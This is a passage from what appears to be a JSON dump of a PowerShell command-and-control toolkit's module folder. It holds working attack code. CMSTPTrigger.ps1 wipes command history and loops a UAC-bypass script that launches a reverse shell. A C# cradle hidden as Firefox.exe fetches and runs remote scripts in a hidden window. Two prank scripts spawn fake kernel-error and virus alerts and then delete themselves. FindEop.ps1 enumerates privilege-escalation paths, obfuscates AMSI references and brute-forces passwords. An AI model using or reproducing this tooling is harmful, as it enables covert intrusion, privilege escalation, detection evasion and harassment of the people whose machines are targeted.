\"https://www.travelgay.com/destination/gay-portugal/gay-lisbon\"\r\n$UriLink = \"https://theculturetrip.com/europe/portugal/lisbon/articles/the-top-10-lgbt-clubs-and-bars-in-lisbon\"\r\n\r\n\r\n#Download sound sfx files from my github repository\r\nIf($WaveFile -ieq \"Critical.wav\" -or $WaveFile -iNotMatch '(.wav)$')\r\n{\r\n If($WaveFile -iNotMatch '(.wav)$')\r\n {\r\n $WaveFile = \"Critical.wav\"\r\n write-host \"x\" -ForegroundColor Red -NoNewline;\r\n write-host \" error: Cmdlet only accepts .wav formats ..\" -ForegroundColor DarkGray\r\n write-host \" => Using default cmdlet sfx sound effect ..\" -ForegroundColor DarkYellow\r\n Start-Sleep -Seconds 1\r\n }\r\n\r\n ## Download 'Critical error' windows sound effect\r\n write-host \" => Download 'Critical error' sfx sound effect\" -ForegroundColor DarkYellow\r\n iwr -uri \"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/theme/Critical.wav\" -outfile \"Critical.wav\"|Unblock-File\r\n}\r\n\r\n\r\nIf($PreventBSOD -ieq \"true\")\r\n{\r\n If($MaxInteractions -gt 200)\r\n {\r\n $DelayTime = \"10\"\r\n [int]$MaxInteractions = 100\r\n write-host \"x\" -ForegroundColor Red -NoNewline\r\n write-host \" Error: current -maxinteractions parameter will cause BS`OD ..\" -ForegroundColor DarkGray\r\n write-host \" => Defaulting -maxinteractions arg to '$MaxInteractions' interactions ..\" -ForegroundColor DarkYellow\r\n }\r\n}\r\n\r\n\r\n## lOOP Function\r\n$PlayWav = New-Object System.Media.SoundPlayer\r\nwrite-host \"* maxinteractions: $MaxInteractions with: $DelayTime (seconds)\" -ForegroundColor Green\r\nFor($i=1; $i -lt $MaxInteractions; $i++)\r\n{\r\n #Delay time before playing sfx\r\n Start-Sleep -Seconds $DelayTime\r\n\r\n If($i -Match '^(1|3|5|7|9|11|13|15|17|19|21|23|25|27|29|30|40|50|60|70|80|90|97|98|99|100)$')\r\n {\r\n #Open Gay website on default browser and play sfx sound\r\n Start-Process -WindowStyle Maximized \"$UrlLink\"|Out-Null\r\n $PlayWav.SoundLocation = \"$WaveFile\"\r\n $PlayWav.playsync();\r\n }\r\n ElseIf($i -Match '^(2|4|6|8|10|12|14|16|18|20|22|24|26|28|30|40|50|60|70|80|90|97|98|99|100)$')\r\n {\r\n #Open Gay website on default browser and play sfx sound\r\n Start-Process -WindowStyle Maximized \"$UriLink\"|Out-Null\r\n $PlayWav.SoundLocation = \"$WaveFile\"\r\n $PlayWav.playsync(); \r\n }\r\n ElseIf($i -Match '^(7|9|12|15|18|21|24|27|30|40|43|47|50|60|62|64|68|70|80|90|97|98|99|100)$')\r\n {\r\n #Open Gay website on default browser and play sfx sound\r\n Start-Process -WindowStyle Maximized \"$LasLink\"|Out-Null\r\n $PlayWav.SoundLocation = \"$WaveFile\"\r\n $PlayWav.playsync(); \r\n }\r\n\r\n $MsgBoxTitle = \"KERNEL WARNNING 00xf340d0.421\"\r\n $MsgBoxText = \"Kernel: Critical Error 00xf340d0.421 Memory Corruption!\"\r\n #Spawn cmd terminal console and make it look like one kernel error as ocurr\r\n Start-Process cmd.exe -argumentlist \"/R color 90&title $MsgBoxTitle&echo $MsgBoxText&Pause\"\r\n\r\n\r\n ## Check Operative system version [BallonTip]\r\n If(([System.Environment]::OSVersion.Version.Major) -match '^(7|8|8.1|10)$')\r\n {\r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - Display a ballontip in notification area\r\n #>\r\n\r\n Add-Type -AssemblyName System.Windows.Forms\r\n $GlobalShit = \"£N@e£w-O@bj£ec@t S@y£st£e@m.W@in£do@w£s.F£o@rm@s.N@ot£i@fyI@co@n£\" -replace '(@|£)',''\r\n $global:balmsg = $GlobalShit|&('XeX' -replace '^(X)','i')\r\n $path = (Get-Process -id $pid).Path\r\n\r\n ## Build ballon box\r\n $balmsg.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($path)\r\n $balmsg.BalloonTipIcon = [System.Windows.Forms.ToolTipIcon]::Warning\r\n $balmsg.BalloonTipText = \"A virus has detected in $Env:COMPUTERNAME\"\r\n $balmsg.BalloonTipTitle = \"Attention $Env:USERNAME\"\r\n $balmsg.Visible = $true\r\n $balmsg.ShowBalloonTip(20000)\r\n }\r\n\r\n Start-Sleep -Seconds 1\r\n Start $Env:PROGRAMFILES\r\n\r\n If($i -Match '^(3|7|12|13|15|16|18|20|23|27|30|32|33|40|50|60|70|80|90|97|98|99|100)$')\r\n {\r\n $HexProcessName = $null\r\n ## Open drive manager [HEX obfuscated]\r\n $DeObfuscate = '64 69 73 6B 6D 67 6D 74 2E 6D 73 63'.Split(\" \")|ForEach{[char]([convert]::toint16($_,16))}|ForEach{$HexProcessName=$HexProcessName+$_}\r\n Start-Process $HexProcessName\r\n }\r\n ElseIf($i -Match '^(5|9|14|17|18|19|20|21|25|29|30|40|50|60|70|80|90|97|98|99|100)$')\r\n {\r\n $HexProcessName = $null\r\n #Open firewall manager [HEX obfuscated]\r\n $DeObfuscate = '66 69 72 65 77 61 6C 6C 2E 63 70 6C'.Split(\" \")|ForEach{[char]([convert]::toint16($_,16))}|ForEach{$HexProcessName=$HexProcessName+$_}\r\n Start-Process $HexProcessName\r\n }\r\n ElseIf($i -Match '^(6|8|9|11|13|15|17|19|20|22|23|24|30|40|50|60|70|80|90|97|98|99|100)$')\r\n {\r\n $HexProcessName = $null\r\n #Open programs manager [HEX obfuscated]\r\n $DeObfuscate = '61 70 70 77 69 7A 2E 63 70 6C'.Split(\" \")|ForEach{[char]([convert]::toint16($_,16))}|ForEach{$HexProcessName=$HexProcessName+$_}\r\n Start-Process $HexProcessName \r\n }\r\n ElseIf($i -Match \"^($FinalSfx)$\")\r\n {\r\n #Play final sfx sound {Critical error}\r\n $PlayWav.SoundLocation = \"$WaveFile\"\r\n $PlayWav.playsync();\r\n }\r\n\r\n #Spawn cmd terminal console and make it look like one kernel error as ocurr\r\n Start-Process cmd.exe -argumentlist \"/R color C0&title $MsgBoxTitle&echo $MsgBoxText&Pause\"\r\n\r\n}\r\n\r\n\r\nStart-Sleep -Seconds 1\r\n#Clean artifacts left behind\r\nRemove-Item -Path \"$WaveFile\" -Force\r\nRemove-Item -Path \"$pwd\\hensandrooster.wav\" -Force\r\n\r\n#Spawn alert message box at loop completed\r\npowershell (New-Object -ComObject Wscript.Shell).Popup(\"$MsgBoxText\",0,\"$MsgBoxTitle\",0+64)|Out-Null\r\n\r\n#Auto Delete this cmdlet in the end ...\r\nRemove-Item -LiteralPath $MyInvocation.MyCommand.Path -Force" }, { "path": "mimiRatz/CMSTPTrigger.ps1", "content": "<#\r\n.SYNOPSIS\r\n CmdLet to loop UACBypassCMSTP.ps1 execution!\r\n\r\n Author: @r00t-3xp10it\r\n Tested Under: Windows 10 (19043) x64 bits\r\n Required Dependencies: UACBypassCMSTP.ps1 {auto}\r\n Optional Dependencies: none\r\n PS cmdlet Dev version: v1.1.5\r\n\r\n.DESCRIPTION\r\n This cmdlet its a module of @Meterpeter C2 v2.10.11.15 release, that allow \r\n meterpeter users to elevate session shell privileges from UserLand to Admin. \r\n\r\n.NOTES\r\n By default it downloads\\executes 'UACBypassCMSTP.ps1' from %TMP% directory,\r\n that for is turn executes the reverse tcp shell ( only PS1 scripts ) from\r\n sellected location. That location can be set using -RatLocation parameter.\r\n\r\n.Parameter DelayTime\r\n Seconds to delay UACBypassCMSTP.ps1 execution (default: 30)\r\n\r\n.Parameter LoopFor\r\n How Many times do we execute the loop function? (default: 2)\r\n\r\n.Parameter RatLocation\r\n Path of script to exec (default: $Env:TMP\\Update-KB5005101.ps1)\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\CMSTPTrigger.ps1 -DelayTime \"60\"\r\n Execute 'UACBypassCMSTP.ps1' after 60 seconds.\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\CMSTPTrigger.ps1 -DelayTime \"60\" -LoopFor \"5\"\r\n Execute UACBypassCMSTP.ps1 at each '60' seconds, a max of '5' times.\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\CMSTPTrigger.ps1 -DelayTime \"10\" -LoopFor \"3\" -RatLocation \"$Env:USERPROFILE\\Desktop\\rat.ps1\"\r\n Execute UACBypassCMSTP.ps1 at each '10' seconds that exec -RatLocation '<string'>, a max of '3' times.\r\n\r\n.OUTPUTS\r\n * Elevate session from UserLand to Administrator!\r\n => Download: UACBypassCMSTP from GitHub into %TMP% ..\r\n\r\n MaxExec DelayTime RatLocation\r\n ------- --------- -------------\r\n 2 30(sec) C:\\Users\\pedro\\AppData\\Local\\Temp\\Update-KB5005101.ps1\r\n\r\n * Exit @meterpeter and start a new handler to recive the elevated shell.\r\n => Remenber: To manual delete artifacts from 'TMP' dir after escalation.\r\n \r\n.LINK\r\n https://oddvar.moe/2017/08/15/research-on-cmstp-exe\r\n https://github.com/r00t-3xp10it/redpill/blob/main/bypass/UACBypassCMSTP.ps1\r\n https://github.com/r00t-3xp10it/meterpeter/blob/master/mimiRatz/CMSTPTrigger.ps1\r\n#>\r\n\r\n\r\n [CmdletBinding(PositionalBinding=$false)] param(\r\n [string]$RatLocation=\"False\",\r\n [int]$DelayTime=\"30\",\r\n [int]$LoopFor=\"2\"\r\n)\r\n\r\n\r\n$TryFor = $LoopFor+1\r\n$FailedExecution = \"False\"\r\n$GostavasDeSaber = \"@m_tp\"\r\n$ErrorActionPreference = \"SilentlyContinue\"\r\n#Disable Powershell Command Logging for current session.\r\nSet-PSReadlineOption –HistorySaveStyle SaveNothing|Out-Null\r\n$NoStringsForYou = ($GostavasDeSaber).Replace(\"@\",\"c\").Replace(\"_\",\"s\")\r\nWrite-Host \"* Elevate session from UserLand to Administrator!\" -ForegroundColor Green\r\n\r\nIf(-not(Test-Path -Path \"$Env:TMP\\UACBypassCMSTP.ps1\"))\r\n{\r\n #Download CmdLet from my GitHub repository into %tmp% directory.\r\n Write-Host \" => Downloading: UACBypassCMSTP from GitHub into %TMP% ..\" -ForeGroundColor Blue\r\n iwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bypass/UACBypassCMSTP.ps1\" -OutFile \"$Env:TMP\\UACBypassCMSTP.ps1\"|Out-Null\r\n}\r\n\r\nIf($RatLocation -ne \"False\")\r\n{\r\n If($RatLocation -iNotMatch '(.ps1)$')\r\n {\r\n $RatLocation = \"$Env:TMP\\Update-KB5005101.ps1\"\r\n Write-Host \" => Error: This function only accepts .PS1 scripts ..\" -ForegroundColor Red -BackgroundColor Black\r\n Write-Host \" => Using default value: `$Env:TMP\\Update-KB5005101.ps1`n\" -ForegroundColor Blue \r\n }\r\n Else\r\n {\r\n #Replace RatLocation on UACBypassCMSTP cmdlet?\r\n ((Get-Content -Path \"$Env:TMP\\UACBypassCMSTP.ps1\" -Raw) -Replace '\\$Env:TMP\\\\Update-KB5005101.ps1',\"$RatLocation\")|Set-Content -Path \"$Env:TMP\\UACBypassCMSTP.ps1\"\r\n }\r\n}\r\nElse\r\n{\r\n #Use default RatLocation Parameter declaration.\r\n $RatLocation = \"$Env:TMP\\Update-KB5005101.ps1\"\r\n}\r\n\r\n\r\nfor($i=1; $i -lt $TryFor; $i++)\r\n{\r\n\r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - For() function to loop for sellected amount of times.\r\n\r\n .NOTES\r\n The UACBypassCMSTP.ps1 CmdLet executes Update-KB50005101.ps1\r\n reverse tcp shell each time that loops, with sellected time delay.\r\n CmdLet will check cm`stp process state and CorpVpn network adapter\r\n profile, before each loop exec to prevent adapter gui from pop up. \r\n #>\r\n\r\n try{\r\n\r\n Start-Sleep -Seconds $DelayTime\r\n #Make sure cms`tp process its not runing!\r\n If((Get-Process -Name $NoStringsForYou -EA silentlycontinue).Responding -Match '^(True)$')\r\n {\r\n Stop-Process -Name $NoStringsForYou -Force\r\n Start-Sleep -Milliseconds 1500\r\n }\r\n\r\n #Make sure CorpVpn network adapter profile its not active!\r\n $CorpVpnAdapterState = Get-NetAdapter | ? { $_.Name -like \"*CorpVpn*\" }\r\n If(-not($CorpVpnAdapterState) -or $CorpVpnAdapterState -ieq $null)\r\n {\r\n #Make sure we dont have a session allready open before exec EOP again!\r\n $readLog = Get-Content -Path \"$Env:TMP\\EOPsettings.log\" -EA SilentlyContinue\r\n If(-not($readLog) -or $readLog -ieq $null)\r\n {\r\n $ShellConnection = $null\r\n }\r\n Else\r\n {\r\n $ShellConnection = netstat -ano|Findstr /C:\"$readLog\"\r\n }\r\n\r\n If(-not($ShellConnection) -or $ShellConnection -ieq $null)\r\n {\r\n #Execute EOP script without rebooting!\r\n powershell -exec bypass -WindowStyle hidden -File \"$Env:TMP\\UACBypassCMSTP.ps1\"\r\n }\r\n }\r\n\r\n }catch{$FailedExecution = \"True\"\r\n Write-Host \"[x] Error: fail to execute '$Env:TMP\\UACBypassCMSTP.ps1' (EOP)\" -ForegroundColor Red -BackgroundColor Black\r\n Write-Host \"`n\";exit #Exit @CMSTPTrigger\r\n }\r\n\r\n}\r\n\r\n\r\n#Build output DataTable!\r\n$mytable = New-Object System.Data.DataTable\r\n$mytable.Columns.Add(\"MaxExec\")|Out-Null\r\n$mytable.Columns.Add(\"DelayTime\")|Out-Null\r\n$mytable.Columns.Add(\"RatLocation\")|Out-Null\r\n\r\n#Adding values to DataTable!\r\n$mytable.Rows.Add(\"$LoopFor\", ## max eop executions\r\n \"$DelayTime(sec)\", ## Looop each <int> seconds\r\n \"$RatLocation\" ## rat client absoluct path\r\n)|Out-Null\r\n\r\n#Diplay output DataTable!\r\n$mytable | Format-Table -AutoSize | Out-String -Stream | ForEach-Object {\r\n $stringformat = If($_ -Match '^(MaxExec)'){\r\n @{ 'ForegroundColor' = 'Green' } }Else{ @{} }\r\n Write-Host @stringformat $_\r\n}\r\n\r\n\r\n#Final stdout displays\r\nIf($FailedExecution -ieq \"False\")\r\n{\r\n Write-Host \"* Exit @Meterpeter and start a new handler to recive the elevated shell.\" -ForegroundColor Green\r\n Write-Host \" => Remenber: To manual delete artifacts from 'TMP' dir after escalation.`n\" -ForegroundColor Blue\r\n Remove-Item -Path \"$Env:TMP\\EOPsettings.log\" -Force\r\n}" }, { "path": "mimiRatz/CScrandle_fileless.cs", "content": "/*\r\n Author: @r00t-3xp10it\r\n redpill v1.2.6 - CsOnTheFly Internal Module!\r\n\r\n Title: StandAlone executable fileless cmdlet's download crandle.\r\n Description: Program.cs (to be compiled to standalone executable) that allow users to fileless download\\execute URL cmdlet's\r\n \r\n Dependencies: iwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/CsOnTheFly.ps1\" -OutFile \"CsOnTheFly.ps1\"\r\n Compile: .\\CsOnTheFly.ps1 -action \"compile\" -uri \"CScrandle_fileless.cs\" -outfile \"Firefox.exe\" -filedescription \"@Mozilla FireFox\" -iconset \"true\"\r\n*/\r\n\r\nusing System.Diagnostics;\r\nnamespace Console\r\n{\r\n class Program\r\n {\r\n static void Main(string[] args)\r\n {\r\n var filePath = @\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\";\r\n\r\n Process process = new Process();\r\n process.StartInfo.FileName = filePath;\r\n process.StartInfo.Arguments = \"$Proxy=New-Object -ComObject MsXml2.ServerXmlHttp;$Proxy.Open('GET','https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/utils/test.ps1',0);$Proxy.Send();[scriptblock]::Create($Proxy.ResponseText).Invoke()\";\r\n process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;\r\n process.Start();\r\n }\r\n }\r\n}" }, { "path": "mimiRatz/FWUprank.ps1", "content": "<#\r\n.SYNOPSIS\r\n Fake Windows Update Prank\r\n\r\n Author: @r00t-3xp10it (ssa redteam)\r\n Tested Under: Windows 10 (19044) x64 bits\r\n Required Dependencies: none\r\n Optional Dependencies: none\r\n PS cmdlet Dev version: v1.0.5\r\n\r\n.DESCRIPTION\r\n Auxiliary module of Meterpeter C2 v2.10.13 that executes an prank in background.\r\n The prank opens the default web browser in fakeupdate.net website in full screen\r\n mode. To abort the prank target user requires to manual press {F11} on is keyboard.\r\n\r\n.NOTES\r\n This cmdlet gets the default web browser name\\path\\command and operative system\r\n version number (to select fakeupdate.net correct wallpaper) before download and\r\n invoking sendkeys.ps1 cmdlet that opens fakeupdate.net website in full screen mode.\r\n sendkeys.ps1 cmdlet its invoked to send keyboard keys to the browser {Enter + F11}\r\n\r\n.Parameter AutoDelete\r\n Auto-Delete this cmdlet in the end? (default: off)\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\FWUprank.ps1\r\n\r\n.EXAMPLE\r\n PS C:\\> powershell -file FWUprank.ps1\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\FWUprank.ps1 -autodelete 'on'\r\n Auto-Delete this cmdlet in the end\r\n\r\n.INPUTS\r\n None. You cannot pipe objects into FWUprank.ps1\r\n\r\n.OUTPUTS\r\n * Send Keys to running programs\r\n + Start and capture process info.\r\n + Success, sending key: 'https://fakeupdate.net/win11/~{F11}'\r\n + Process PID: '11864'\r\n * Exit sendkeys cmdlet execution ..\r\n \r\n.LINK\r\n https://github.com/r00t-3xp10it/meterpeter\r\n#>\r\n\r\n\r\n[CmdletBinding(PositionalBinding=$false)] param(\r\n [string]$AutoDelete=\"off\" #autodelete cmdlet in the end\r\n)\r\n\r\n\r\n#Global variable declarations\r\n$ErrorActionPreference = \"SilentlyContinue\"\r\n#Store operative system version\r\n$OsVersion = [System.Environment]::OSVersion.Version.Major\r\nIf([string]::IsNullOrEmpty($OsVersion))\r\n{\r\n write-host \"`n x\" -ForegroundColor Red -NoNewline\r\n write-host \" fail to get operative sistem version number ...`n\" -ForegroundColor DarkGray\r\n return\r\n}\r\n\r\n\r\n#Store default web browser name\r\n$RegexDecode = (([regex]::Matches(\"ecioh@Cre@sU\\pt@th\\sno@ita@icos@sAlrU\\snoita@ico@ssA\\lle@hS\\swod@niW\\tf@os@orciM\\ERA@WTF@OS\\:UCK@H\",'.','RightToLeft')|ForEach{$_.value}) -join '')\r\n$DefaultSettingPath = \"$RegexDecode\" -replace '@',''\r\n$DefaultBrowserName = (Get-Item -Path \"$DefaultSettingPath\"|Get-ItemProperty).ProgId\r\nIf([string]::IsNullOrEmpty($DefaultBrowserName))\r\n{\r\n write-host \"`n x\" -ForegroundColor Red -NoNewline\r\n write-host \" fail to get default web browser name ...`n\" -ForegroundColor DarkGray\r\n return\r\n}\r\n\r\n\r\n#Create PSDrive to HK`EY_CL`ASSES_RO`OT\r\n$ShellCommand = \"`$n£u@l£l = N@e£w-£P@SD£ri@ve -P£SP@ro£vid@er r£eg@ist@ry -£Ro@o£t 'H£K@EY_£C@LAS£SE@S_£RO@O@T' -N@a@me 'H£K@C£R'\" -replace '(@|£)',''\r\n$ShellCommand|&('XeX' -replace '^(X)','i')\r\n\r\n#Get the default browser executable command/path\r\n$TestMeNpw = \"£H@KC£R@:\\$DefaultBrowserName\\£s@hel@l\\£o@pe@n\\c£om@ma£n@d\" -replace '(@|£)',''\r\n$DefaultBrowserOpenCommand = (Get-Item \"$TestMeNpw\"|Get-ItemProperty).'(default)'\r\n$DefaultBrowserPathSanitize = [regex]::Match($DefaultBrowserOpenCommand,'\\\".+?\\\"')\r\nRemove-PSDrive -Name 'HKCR'\r\n\r\nIf([string]::IsNullOrEmpty($DefaultBrowserPathSanitize))\r\n{\r\n write-host \"`n x\" -ForegroundColor Red -NoNewline\r\n write-host \" fail to get default browser executable command/path...`n\" -ForegroundColor DarkGray\r\n return\r\n}\r\n\r\n#Sanitize command\r\n$DefaultBrowserPath = $DefaultBrowserPathSanitize.value -replace '\"',''\r\n$SendKeyscmdlet = \"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Misc-CmdLets/sendkeys.ps1\"\r\n\r\n#Select the OS version to run\r\nIf($OsVersion -match '^(xp)$')\r\n{\r\n $SystemId = \"xp\"\r\n}\r\nElseIf($OsVersion -match '^(7)$')\r\n{\r\n $SystemId = \"win7\"\r\n}\r\nElseIf($OsVersion -match '^(10)$')\r\n{\r\n $SystemId = \"win10ue\"\r\n}\r\nElseIf($OsVersion -match '^(11)$')\r\n{\r\n $SystemId = \"win11\"\r\n}\r\nElse\r\n{\r\n $SystemId = \"win11\"\r\n}\r\n\r\n#Download sendkes cmdlet from github\r\niwr -uri \"$SendKeyscmdlet\" -OutFile \"sendkeys.ps1\"\r\n#Execute sendkeys cmdlet to open default browser in fakeupdate.net in full windows mode\r\n.\\sendkeys.ps1 -Program \"$DefaultBrowserPath\" -SendKey \"https://fakeupdate.net/$SystemId/~{F11}\"\r\n\r\n#CleanUp\r\nRemove-Item -Path \"sendkeys.ps1\" -Force\r\nIf($AutoDelete -iMatch '^(on)$')\r\n{\r\n #Auto Delete this cmdlet in the end ...\r\n Remove-Item -LiteralPath $MyInvocation.MyCommand.Path -Force\r\n}" }, { "path": "mimiRatz/FindEop.ps1", "content": "<#\r\n.SYNOPSIS\r\n Search for Escalation Of privileges Entrys [local]\r\n\r\n Author: @r00t-3xp10it\r\n Tested Under: Windows 10 (19044) x64 bits\r\n Required Dependencies: Invoke-WebRequest {native}\r\n Optional Dependencies: ACLMitreT1574.ps1, Sherlock.ps1 {download}\r\n PS cmdlet Dev version: v2.3.28\r\n\r\n.DESCRIPTION\r\n Auxiliary module of @Meterpeter C2 v2.10.14 FindEOP module, That allow users to search\r\n for possible Escalation Of Privileges entrys [local] using diferent documented technics.\r\n https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Methodology%20and%20Resources\r\n\r\n.NOTES\r\n Parameter -bruteforce 'true' brute forces active user account password, while -bruteforce 'pedro'\r\n brute forces the 'pedro' user account password. If you wish to use your own dicionary file then\r\n create it in %tmp% directory under the name 'passwords.txt' that bruteforce function will use it.\r\n\r\n Download\\Execute FindEOP.ps1 CmdLet:\r\n iwr -uri \"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/FindEop.ps1\" -outfile \"FindEOP.ps1\";.\\FindEOP.ps1\r\n\r\n.Parameter Verb\r\n Use agressive scans? [slower] (default: false)\r\n\r\n.Parameter BruteForce\r\n Brute force user account password? (default: false)\r\n \r\n.EXAMPLE\r\n PS C:\\> .\\FindEop.ps1\r\n Default scan takes 3 minuts to finish\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\FindEop.ps1 -verb 'true'\r\n Agressive scan takes 6 minuts to finish\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\FindEop.ps1 -bruteforce 'true'\r\n Scans for EOP and brute force user account pass\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\FindEop.ps1 -bruteforce 'pedro'\r\n Scans for EOP and brute force pedro account pass\r\n\r\n.INPUTS\r\n None. You cannot pipe objects into FindEop.ps1\r\n\r\n.OUTPUTS\r\n Privilege Name Description State\r\n ============================= ============================================= ========\r\n SeAssignPrimaryTokenPrivilege Replace a process-level token Disabled\r\n SeShutdownPrivilege Shut down the system Disabled\r\n SeChangeNotifyPrivilege Ignore cross scan Enabled\r\n SeUndockPrivilege Remove computer from docking station Disabled\r\n SeIncreaseWorkingSetPrivilege Augment a working set of processes Disabled\r\n SeTimeZonePrivilege Change time zone Disabled\r\n\r\n\r\n DIRECTORYS WITH 'FULLCONTROLL, MODIFY' PERMISSIONS\r\n --------------------------------------------------\r\n VulnId : 1::ACL (Mitre T1574)\r\n FolderPath : C:\\Program Files (x86)\\Battle.net\r\n FileSystemRights : FullControl\r\n IdentityReference : BUILTIN\\Users\r\n IsInherited : False\r\n\r\n VulnId : 2::ACL (Mitre T1574)\r\n FolderPath : C:\\Program Files (x86)\\Resource Hacker\r\n FileSystemRights : FullControl\r\n IdentityReference : Everyone\r\n IsInherited : False\r\n \r\n.LINK\r\n https://github.com/r00t-3xp10it/meterpeter\r\n https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Methodology%20and%20Resources\r\n#>\r\n\r\n\r\n[CmdletBinding(PositionalBinding=$false)] param(\r\n [string]$BruteForce=\"false\",\r\n [string]$Verb=\"false\"\r\n)\r\n\r\n\r\n#Local variables\r\n$BatVersion = \"v2.3.28\"\r\n$LocalPath = (Get-Location).Path\r\n#Demonstration logfile with credentials in cleartext\r\necho \"Logfile created by @FindEop\" > $Env:TMP\\ObeeRkiE.log\r\necho \"username: @FindEop_Demonstration\" >> $Env:TMP\\ObeeRkiE.log\r\necho \"password: myS3cR3T_In_ClearText\" >> $Env:TMP\\ObeeRkiE.log\r\n$host.UI.RawUI.WindowTitle = \"FindEop $BatVersion {SSA RedTeam @2024}\"\r\n#Spirit of Heaven, Goddess of Fire and Life!\r\n$Banner = @\"\r\n\r\n \\ /\r\n (())\r\n ,~L_\r\n 2~~ ^<\\\r\n )^>-\\y(((GSSsss _$BatVersion\r\n __________________________________)v_\\__________________________________\r\n (_// / / / (///////\\3__________((_/ _((__________E/\\\\\\\\\\\\\\) \\ \\ \\ \\\\_)\r\n (_/ / / / (////////////////////(c (c /^|\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\) \\ \\ \\ \\_)\r\n \"(_/ / / /(/(/(/(/(/(/(/(/(/(/\\_ /\\)\\)\\)\\)\\)\\)\\)\\)\\)\\)\\ \\ \\ \\_)\"\r\n \"(_/ / / / / / / / / / / / /|___/\\ \\ \\ \\ \\ \\ \\ \\ \\ \\ \\ \\ \\_)\"\r\n \"(_(_(_(_(_(_(_(_(_(_(_(_[_]_|_)_)_)_)_)_)_)_)_)_)_)_)\"\r\n ^| \\\r\n / / /___\r\n / / '~~~~~__.\r\n \\_\\_______________\\_'_?\r\n Spirit of Heaven, Goddess of Fire and Life\r\n Methodology: https://shorturl.at/oJRV0 {@swisskyrepo}\r\n\r\n\r\n\"@;\r\nWrite-Host $Banner\r\n## CmdLet Banner Timeout\r\nStart-Sleep -Seconds 2\r\n\r\n\r\n$FucOrNot = \"£SY@S£T£E@M @IN£F@OR£MA@TI£O@N\" -replace '(@|£)',''\r\nWrite-Host \"$FucOrNot\"\r\nWrite-Host \"------------------\"\r\n$FucOrNot = \"s@y£st£e@min£@fo£ @>£ s@y£st@e£mi@nf£o.@t£x@t\" -replace '(@|£)',''\r\n$FucOrNot|&('Rex' -replace 'R','i')\r\n$FucOrNot = \"s@y£st£e@min£@fo£.t@xt£\" -replace '(@|£)',''\r\nGet-Content $FucOrNot|findstr \"Host OS Registered Owner: Locale:\"|findstr /V /C:\"Registered Organization:\"|findstr /V /C:\"BIOS Version:\"|findstr /V /C:\"OS Build Type:\"|findstr /V /C:\"Input Locale:\"\r\nRemove-Item -path $FucOrNot -Force\r\nWrite-Host \"`n\"\r\n\r\n\r\n#List UAC settings\r\nWrite-Host \"USER ACCOUNT CONTROL\"\r\nWrite-Host \"--------------------\" \r\n$RawPolicyKey = 'HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system';\r\n$UacStatus = (Get-Itemproperty -path $RawPolicyKey).EnableLUA;\r\n$ConsentPromptBehaviorUser = (Get-Itemproperty -path $RawPolicyKey).ConsentPromptBehaviorUser;\r\n$ConsentPromptBehaviorAdmin = (Get-Itemproperty -path $RawPolicyKey).ConsentPromptBehaviorAdmin;\r\n\r\nIf($UacStatus -eq 0)\r\n{\r\n Write-Host \"UAC Status : Disabled REG_DWORD 0x0\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElseIf($UacStatus -eq 1)\r\n{\r\n Write-Host \"UAC Status : Enabled REG_DWORD 0x1\" -ForeGroundColor Red\r\n}\r\n\r\nIf($ConsentPromptBehaviorAdmin -eq 5 -and $ConsentPromptBehaviorUser -eq 3)\r\n{\r\n Write-Host \"UAC Settings : Notify Me (a:0x5|u:0x3)\" -ForegroundColor Yellow\r\n}\r\nElseIf($ConsentPromptBehaviorAdmin -eq 0 -and $ConsentPromptBehaviorUser -eq 3)\r\n{\r\n Write-Host \"UAC Settings : Never Notify (a:0x0|u:0x3)\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElseIf($ConsentPromptBehaviorAdmin -eq 2 -and $ConsentPromptBehaviorUser -eq 3)\r\n{\r\n Write-Host \"UAC Settings : Allways Notify (a:0x2|u:0x3)\" -ForeGroundColor Red -BackGroundColor Black\r\n}\r\nWrite-Host \"`n\"\r\n\r\n\r\nIf($Verb -ieq \"True\")\r\n{\r\n #List Anti-Virus Info\r\n Write-Host \"ANTI-VIRUS DEFINITIONS\"\r\n Write-Host \"----------------------\"\r\n iwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/Get-AVStatus.ps1\" -OutFile \"$Env:TMP\\Get-AVStatus.ps1\"|Unblock-File;\r\n powershell -File \"$Env:TMP\\Get-AVStatus.ps1\";Remove-Item -Path \"$Env:TMP\\Get-AVStatus.ps1\" -Force\r\n Write-Host \"`n\"\r\n\r\n #What processes loaded am`si.dl`l?\r\n Write-Host \"PROCESSES THAT LOAD AMS`I.DL`L\" \r\n Write-Host \"----------------------------\"\r\n $ParseData = \"@m`s`i.d!!\" #Obfucate am`si.dll API call\r\n $ObfuscatedAPI = $ParseData -replace '@','a' -replace '!','l'\r\n ps | Where-Object {\r\n $_.Modules.ModuleName -contains \"$ObfuscatedAPI\"\r\n }|Select-Object Handles,NPM,PM,WS,CPU,SI,ProcessName,@{Name='Loaded DLL';Expression={\"$ObfuscatedAPI\"}}|Format-Table -AutoSize|Out-String -Stream|Select-Object -Skip 1\r\n}\r\n\r\n\r\n#List UserPrivs\r\nWrite-Host \"USER INFORMATION\"\r\nWrite-Host \"----------------\"\r\nwhoami /user|Format-Table|Out-String -Stream|Select-Object -Skip 4\r\nWrite-Host 